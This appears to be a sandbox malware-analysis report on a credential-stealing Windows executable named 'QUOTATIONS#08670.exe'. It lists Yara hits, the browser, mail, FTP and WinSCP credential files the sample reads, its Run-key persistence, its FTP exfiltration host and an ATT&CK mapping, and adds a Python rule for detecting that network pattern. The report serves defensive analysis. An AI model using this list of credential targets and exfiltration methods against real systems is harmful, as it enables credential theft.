                  Source: Yara matchFile source: 00000004.00000002.2575902767.00000000030DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.2597502551.0000000004213000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.2596669969.0000000003CC5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.2570779363.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.2597502551.0000000004345000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2017156067.00000000038DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.2597502551.000000000413F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2017156067.00000000037AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.2596669969.0000000003B94000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: QUOTATIONS#08670.exe PID: 7592, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: QUOTATIONS#08670.exe PID: 8124, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: newapp.exe PID: 6576, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: newapp.exe PID: 3820, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\cookies.sqliteJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
Source: Yara match; File source: 9.2.newapp.exe.3cc54ba.4.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.2.newapp.exe.4345322.3.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.2.newapp.exe.43823e0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 9.2.newapp.exe.3d02578.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.2.newapp.exe.428e0d2.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.QUOTATIONS#08670.exe.3828c62.4.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.QUOTATIONS#08670.exe.391cf70.5.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.2.newapp.exe.4250ff2.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 9.2.newapp.exe.3c4b33a.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 9.2.newapp.exe.3c0e26a.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 9.2.newapp.exe.3c4b33a.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.2.QUOTATIONS#08670.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 9.2.newapp.exe.3bd118a.3.unpack, type: UNPACKEDPE
Source: Yara match; File source: 9.2.newapp.exe.3d02578.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.2.newapp.exe.42cb1a2.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.QUOTATIONS#08670.exe.37ebb82.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.QUOTATIONS#08670.exe.37ebb82.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 9.2.newapp.exe.3c0e26a.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.QUOTATIONS#08670.exe.3865d32.3.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.QUOTATIONS#08670.exe.3828c62.4.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.QUOTATIONS#08670.exe.3865d32.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.2.newapp.exe.428e0d2.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 9.2.newapp.exe.3cc54ba.4.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.QUOTATIONS#08670.exe.38dfeb2.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.2.newapp.exe.43823e0.4.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.2.newapp.exe.42cb1a2.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.2.newapp.exe.4345322.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 9.2.newapp.exe.3bd118a.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.2.newapp.exe.4250ff2.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.QUOTATIONS#08670.exe.391cf70.5.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.QUOTATIONS#08670.exe.38dfeb2.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000004.00000002.2575902767.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.2017156067.00000000036DA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.2596669969.0000000003AC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.2597502551.0000000004213000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.2596669969.0000000003CC5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.2570779363.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.2597502551.0000000004345000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.2017156067.00000000038DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.2597502551.000000000413F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.2017156067.00000000037AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.2596669969.0000000003B94000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: QUOTATIONS#08670.exe PID: 7592, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: QUOTATIONS#08670.exe PID: 8124, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: newapp.exe PID: 6576, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: newapp.exe PID: 3820, type: MEMORYSTR

                  Remote Access Functionality

Source: Yara match; File source: 9.2.newapp.exe.3cc54ba.4.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.2.newapp.exe.4345322.3.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.2.newapp.exe.43823e0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 9.2.newapp.exe.3d02578.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.2.newapp.exe.428e0d2.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.QUOTATIONS#08670.exe.3828c62.4.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.QUOTATIONS#08670.exe.391cf70.5.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.2.newapp.exe.4250ff2.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 9.2.newapp.exe.3c4b33a.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 9.2.newapp.exe.3c0e26a.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 9.2.newapp.exe.3c4b33a.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.2.QUOTATIONS#08670.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 9.2.newapp.exe.3bd118a.3.unpack, type: UNPACKEDPE
Source: Yara match; File source: 9.2.newapp.exe.3d02578.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.QUOTATIONS#08670.exe.37ebb82.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.QUOTATIONS#08670.exe.37ebb82.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 9.2.newapp.exe.3c0e26a.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.QUOTATIONS#08670.exe.3865d32.3.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.2.newapp.exe.42cb1a2.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.QUOTATIONS#08670.exe.3828c62.4.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.QUOTATIONS#08670.exe.3865d32.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.2.newapp.exe.428e0d2.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 9.2.newapp.exe.3cc54ba.4.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.QUOTATIONS#08670.exe.38dfeb2.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.2.newapp.exe.43823e0.4.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.2.newapp.exe.42cb1a2.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.2.newapp.exe.4345322.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 9.2.newapp.exe.3bd118a.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.2.newapp.exe.4250ff2.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.QUOTATIONS#08670.exe.391cf70.5.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.QUOTATIONS#08670.exe.38dfeb2.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000004.00000002.2575902767.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.2017156067.00000000036DA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.2596669969.0000000003AC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.2575902767.00000000030DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.2597502551.0000000004213000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.2596669969.0000000003CC5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.2570779363.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.2597502551.0000000004345000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.2017156067.00000000038DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.2597502551.000000000413F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.2017156067.00000000037AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.2596669969.0000000003B94000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: QUOTATIONS#08670.exe PID: 7592, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: QUOTATIONS#08670.exe PID: 8124, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: newapp.exe PID: 6576, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: newapp.exe PID: 3820, type: MEMORYSTR
MITRE ATT&CK Matrix

Techniques that carry a numeric badge in the report's matrix, grouped by tactic (badge value in brackets, exactly as shown in the matrix). Matrix cells without a badge are the empty navigator template and are omitted.

Reconnaissance: none
Resource Development: none
Initial Access: Valid Accounts [1]
Execution: Windows Management Instrumentation [121]
Persistence: DLL Side-Loading [1]; Valid Accounts [1]; Registry Run Keys / Startup Folder [1]
Privilege Escalation: DLL Side-Loading [1]; Valid Accounts [1]; Access Token Manipulation [1]; Process Injection [112]; Registry Run Keys / Startup Folder [1]
Defense Evasion: Disable or Modify Tools [1]; Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [1]; DLL Side-Loading [1]; Masquerading [1]; Valid Accounts [1]; Access Token Manipulation [1]; Virtualization/Sandbox Evasion [141]; Process Injection [112]; Hidden Files and Directories [1]
Credential Access: OS Credential Dumping [2]; Input Capture [21]; Credentials in Registry [1]
Discovery: File and Directory Discovery [1]; System Information Discovery [24]; Security Software Discovery [211]; Process Discovery [2]; Virtualization/Sandbox Evasion [141]; Application Window Discovery [1]; System Network Configuration Discovery [1]
Lateral Movement: none
Collection: Archive Collected Data [11]; Data from Local System [2]; Email Collection [1]; Input Capture [21]; Clipboard Data [1]
Command and Control: Ingress Tool Transfer [1]; Encrypted Channel [11]; Non-Application Layer Protocol [2]; Application Layer Protocol [23]
Exfiltration: Exfiltration Over Alternative Protocol [1]
Impact: none
Behavior Graph

Behavior Graph ID: 1524956; Sample: QUOTATIONS#08670.exe; Start date: 03/10/2024; Architecture: WINDOWS; Score: 100

Hosts contacted: ftp.ercolina-usa.com; ercolina-usa.com; api.ipify.org
Sample-level signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 7 other signatures

Process tree:

QUOTATIONS#08670.exe (started at top level)
  Dropped: C:\Users\user\...\QUOTATIONS#08670.exe.log, ASCII
  Signatures: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Hides that the sample has been downloaded from the Internet (zone.identifier); Injects a PE file into a foreign processes
  -> QUOTATIONS#08670.exe (child, started by the first instance)
     Network: ercolina-usa.com 192.254.225.136, ports 21, 31841, 45522, UNIFIEDLAYER-AS-1US, United States; api.ipify.org 104.26.12.205, ports 443, 62916, CLOUDFLARENETUS, United States
     Dropped: C:\Users\user\AppData\Roaming\...\newapp.exe, PE32; C:\Users\user\...\newapp.exe:Zone.Identifier, ASCII
     Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal ftp login credentials; 3 other signatures

newapp.exe (started at top level)
  Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
  -> newapp.exe (child)

newapp.exe (started at top level)
  -> newapp.exe (child)
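The behavior graph above shows the injected QUOTATIONS#08670.exe child reaching api.ipify.org on 443 and ercolina-usa.com (192.254.225.136) on 21 from the same process, alongside the FTP/mail/browser credential signatures. As an added example (not Joe Sandbox code and not the sample's logic), the Python below correlates those two network facts over constructed Sysmon-style connection events: a process that asks a public-IP service for its address and opens an FTP control connection within a short window, and is not a known FTP client, is reported. The event layout, the correlation window, the FTP-client allow-list and the sample events are assumptions; PID 8124 is reused from the report only as a label.

```python
"""Correlate a public-IP lookup with outbound FTP from the same process.

Added example, not Joe Sandbox code. Event layout (ts, pid, image, dst_host,
dst_ip, dst_port) is an assumption modelled on Sysmon Event ID 3 fields; the
hosts and ports come from the behavior graph of this report.
"""
from collections import defaultdict
from datetime import datetime, timedelta

IP_CHECK_HOSTS = {"api.ipify.org"}      # seen in this report; extend with others you know
FTP_PORTS = {21}                        # control channel seen in this report
WINDOW = timedelta(minutes=10)          # assumption: how close the two events must be
FTP_CLIENT_IMAGES = {"filezilla.exe", "winscp.exe", "ftp.exe"}  # assumed allow-list


def basename(image):
    """Lower-cased file name of a Windows image path."""
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def correlate_ipcheck_then_ftp(events):
    """Return one finding per process that both asks a public-IP service for
    its address and opens an FTP control connection within WINDOW.

    Either order counts: the report shows both from one process but not
    which came first. Known FTP clients are skipped so that a user uploading
    a file while some other tool checks the public IP does not fire.
    """
    by_pid = defaultdict(list)
    for ev in events:
        by_pid[ev["pid"]].append(ev)

    findings = []
    for pid, evs in sorted(by_pid.items()):
        image = basename(evs[0]["image"])
        if image in FTP_CLIENT_IMAGES:
            continue
        checks = [datetime.fromisoformat(e["ts"]) for e in evs
                  if e.get("dst_host", "").lower() in IP_CHECK_HOSTS]
        if not checks:
            continue
        ftp_hits = [e for e in evs
                    if e["dst_port"] in FTP_PORTS
                    and any(abs(datetime.fromisoformat(e["ts"]) - c) <= WINDOW for c in checks)]
        if ftp_hits:
            findings.append({
                "pid": pid,
                "image": image,
                "ftp_dst": sorted({f"{e['dst_ip']}:{e['dst_port']}" for e in ftp_hits}),
            })
    return findings


# Constructed sample events (not the report's raw log).
SAMPLE_EVENTS = [
    {"ts": "2024-10-03T12:29:05", "pid": 8124, "image": r"C:\Users\user\Desktop\QUOTATIONS#08670.exe",
     "dst_host": "api.ipify.org", "dst_ip": "104.26.12.205", "dst_port": 443},
    {"ts": "2024-10-03T12:29:40", "pid": 8124, "image": r"C:\Users\user\Desktop\QUOTATIONS#08670.exe",
     "dst_host": "ercolina-usa.com", "dst_ip": "192.254.225.136", "dst_port": 21},
    # A real FTP client uploading somewhere: skipped by the allow-list.
    {"ts": "2024-10-03T12:30:00", "pid": 3000, "image": r"C:\Program Files\FileZilla FTP Client\filezilla.exe",
     "dst_host": "", "dst_ip": "203.0.113.5", "dst_port": 21},
    # Public-IP lookup with no FTP session: no finding.
    {"ts": "2024-10-03T12:31:00", "pid": 3100, "image": r"C:\Windows\System32\curl.exe",
     "dst_host": "api.ipify.org", "dst_ip": "104.26.12.205", "dst_port": 443},
    # Lookup and FTP from one process but hours apart: outside WINDOW.
    {"ts": "2024-10-03T09:00:00", "pid": 3200, "image": r"C:\Tools\backup.exe",
     "dst_host": "api.ipify.org", "dst_ip": "104.26.12.205", "dst_port": 443},
    {"ts": "2024-10-03T15:00:00", "pid": 3200, "image": r"C:\Tools\backup.exe",
     "dst_host": "", "dst_ip": "198.51.100.9", "dst_port": 21},
]

if __name__ == "__main__":
    for f in correlate_ipcheck_then_ftp(SAMPLE_EVENTS):
        print(f"pid {f['pid']} ({f['image']}) checked its public IP and spoke FTP to {', '.join(f['ftp_dst'])}")
```

The allow-list is the weak point of this rule: an attacker who injects into a legitimate FTP client would slip past it, so pair it with the process-injection signature the report also raises rather than relying on image names alone.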

Antivirus Detection

Sample
Source | Detection | Scanner
QUOTATIONS#08670.exe | 24% | ReversingLabs
QUOTATIONS#08670.exe | 100% | Joe Sandbox ML

Dropped Files
Source | Detection | Scanner
C:\Users\user\AppData\Roaming\newapp\newapp.exe | 100% | Joe Sandbox ML
C:\Users\user\AppData\Roaming\newapp\newapp.exe | 24% | ReversingLabs
                  No Antivirus matches
                  No Antivirus matches
URLs
Source | Detection | Scanner | Label
https://api.ipify.org/ | 0% | URL Reputation | safe
https://api.ipify.org | 0% | URL Reputation | safe
https://account.dyn.com/ | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
Domains
Name | IP | Active | Malicious | Antivirus Detection | Reputation
ercolina-usa.com | 192.254.225.136 | true | true | (none) | unknown
api.ipify.org | 104.26.12.205 | true | false | (none) | unknown
ftp.ercolina-usa.com | unknown | unknown | true | (none) | unknown
Contacted URLs
Name | Malicious | Antivirus Detection | Reputation
https://api.ipify.org/ | false | URL Reputation: safe | unknown
URLs from Memory and Binaries
Name | Source | Malicious | Antivirus Detection | Reputation
http://go.microsoft.c | newapp.exe, 00000009.00000002.2570999762.0000000000B37000.00000004.00000020.00020000.00000000.sdmp | false | (none) | unknown
http://go.microsoft.cinkI | newapp.exe, 00000009.00000002.2570999762.0000000000B37000.00000004.00000020.00020000.00000000.sdmp | false | (none) | unknown
https://api.ipify.org | QUOTATIONS#08670.exe, 00000000.00000002.2017156067.00000000036DA000.00000004.00000800.00020000.00000000.sdmp; QUOTATIONS#08670.exe, 00000000.00000002.2017156067.00000000038DF000.00000004.00000800.00020000.00000000.sdmp; QUOTATIONS#08670.exe, 00000000.00000002.2017156067.00000000037AE000.00000004.00000800.00020000.00000000.sdmp; QUOTATIONS#08670.exe, 00000004.00000002.2575902767.0000000003061000.00000004.00000800.00020000.00000000.sdmp; QUOTATIONS#08670.exe, 00000004.00000002.2570779363.0000000000402000.00000040.00000400.00020000.00000000.sdmp; newapp.exe, 00000008.00000002.2597502551.0000000004213000.00000004.00000800.00020000.00000000.sdmp; newapp.exe, 00000008.00000002.2597502551.0000000004345000.00000004.00000800.00020000.00000000.sdmp; newapp.exe, 00000008.00000002.2597502551.000000000413F000.00000004.00000800.00020000.00000000.sdmp; newapp.exe, 00000009.00000002.2596669969.0000000003AC0000.00000004.00000800.00020000.00000000.sdmp; newapp.exe, 00000009.00000002.2596669969.0000000003CC5000.00000004.00000800.00020000.00000000.sdmp; newapp.exe, 00000009.00000002.2596669969.0000000003B94000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://account.dyn.com/ | QUOTATIONS#08670.exe, 00000000.00000002.2017156067.00000000036DA000.00000004.00000800.00020000.00000000.sdmp; QUOTATIONS#08670.exe, 00000000.00000002.2017156067.00000000038DF000.00000004.00000800.00020000.00000000.sdmp; QUOTATIONS#08670.exe, 00000000.00000002.2017156067.00000000037AE000.00000004.00000800.00020000.00000000.sdmp; QUOTATIONS#08670.exe, 00000004.00000002.2570779363.0000000000402000.00000040.00000400.00020000.00000000.sdmp; newapp.exe, 00000008.00000002.2597502551.0000000004213000.00000004.00000800.00020000.00000000.sdmp; newapp.exe, 00000008.00000002.2597502551.0000000004345000.00000004.00000800.00020000.00000000.sdmp; newapp.exe, 00000008.00000002.2597502551.000000000413F000.00000004.00000800.00020000.00000000.sdmp; newapp.exe, 00000009.00000002.2596669969.0000000003AC0000.00000004.00000800.00020000.00000000.sdmp; newapp.exe, 00000009.00000002.2596669969.0000000003CC5000.00000004.00000800.00020000.00000000.sdmp; newapp.exe, 00000009.00000002.2596669969.0000000003B94000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://api.ipify.org/t | QUOTATIONS#08670.exe, 00000004.00000002.2575902767.0000000003061000.00000004.00000800.00020000.00000000.sdmp | false | (none) | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | QUOTATIONS#08670.exe, 00000004.00000002.2575902767.0000000003061000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://ftp.ercolina-usa.com | QUOTATIONS#08670.exe, 00000004.00000002.2575902767.00000000030DC000.00000004.00000800.00020000.00000000.sdmp; QUOTATIONS#08670.exe, 00000004.00000002.2575902767.000000000314E000.00000004.00000800.00020000.00000000.sdmp | false | (none) | unknown
http://ercolina-usa.com | QUOTATIONS#08670.exe, 00000004.00000002.2575902767.00000000030DC000.00000004.00000800.00020000.00000000.sdmp; QUOTATIONS#08670.exe, 00000004.00000002.2575902767.000000000314E000.00000004.00000800.00020000.00000000.sdmp | false | (none) | unknown
http://purl.oen | newapp.exe, 00000009.00000002.2605752686.0000000005EE4000.00000004.00000020.00020000.00000000.sdmp | false | (none) | unknown
Contacted IPs
IP | Domain | Country | ASN | ASN Name | Malicious
192.254.225.136 | ercolina-usa.com | United States | 46606 | UNIFIEDLAYER-AS-1US | true
104.26.12.205 | api.ipify.org | United States | 13335 | CLOUDFLARENETUS | false
General Information

Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1524956
Start date and time: 2024-10-03 14:27:11 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 31s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 13
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: QUOTATIONS#08670.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@9/3@2/2
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 203
• Number of non-executed functions: 23
Cookbook Comments:
• Found application associated with file extension: .exe
• Excluded processes from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
• Excluded domains from analysis (whitelisted): d.8.0.a.e.e.f.b.0.0.0.0.0.0.0.0.5.0.0.0.0.0.8.0.0.3.0.1.3.0.6.2.ip6.arpa, fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analysed; the report is missing behavior information
• Report size exceeded maximum capacity and may be missing behavior information
• Report size exceeded maximum capacity and may be missing disassembly code
• Report size getting too big, too many NtOpenKeyEx calls found
• Report size getting too big, too many NtProtectVirtualMemory calls found
• Report size getting too big, too many NtQueryValueKey calls found
• Report size getting too big, too many NtReadVirtualMemory calls found
• VT rate limit hit for: QUOTATIONS#08670.exe
Time | Type | Description
08:28:14 | API Interceptor | 14680x Sleep call for process: QUOTATIONS#08670.exe modified
08:29:31 | API Interceptor | 444x Sleep call for process: newapp.exe modified
14:29:19 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run newapp C:\Users\user\AppData\Roaming\newapp\newapp.exe
14:29:28 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run newapp C:\Users\user\AppData\Roaming\newapp\newapp.exe
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    192.254.225.136RFQ#003110-Al Nasr.exeGet hashmaliciousAgentTeslaBrowse
                                      TRANEXAMIC ACID & CAMPHANEDIOL SPECIFICATIONS.exeGet hashmaliciousAgentTeslaBrowse
                                        F46VBJ6Yvy.exeGet hashmaliciousAgentTeslaBrowse
                                          PO 5002407962.exeGet hashmaliciousAgentTeslaBrowse
                                            0097-CGM CIGIEMME S.p.A.exeGet hashmaliciousAgentTeslaBrowse
                                              SPECIFICATIONS.exeGet hashmaliciousAgentTeslaBrowse
                                                CHEMICAL SPECIFICATIONS.exeGet hashmaliciousAgentTeslaBrowse
                                                  QUOTATION-#170424.exeGet hashmaliciousAgentTeslaBrowse
                                                    SecuriteInfo.com.Win32.CrypterX-gen.6113.26438.exeGet hashmaliciousAgentTeslaBrowse
                                                      SecuriteInfo.com.Win64.PWSX-gen.371.14469.exeGet hashmaliciousAgentTeslaBrowse
                                                        104.26.12.205file.exeGet hashmaliciousUnknownBrowse
                                                        • api.ipify.org/
                                                        file.exeGet hashmaliciousUnknownBrowse
                                                        • api.ipify.org/
                                                        file.exeGet hashmaliciousUnknownBrowse
                                                        • api.ipify.org/
                                                        file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                        • api.ipify.org/
                                                        Prismifyr-Install.exeGet hashmaliciousNode StealerBrowse
                                                        • api.ipify.org/
                                                        2zYP8qOYmJ.exeGet hashmaliciousUnknownBrowse
                                                        • api.ipify.org/
                                                        file.exeGet hashmaliciousUnknownBrowse
                                                        • api.ipify.org/
                                                        file.exeGet hashmaliciousUnknownBrowse
                                                        • api.ipify.org/
                                                        file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                        • api.ipify.org/
                                                        file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                        • api.ipify.org/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
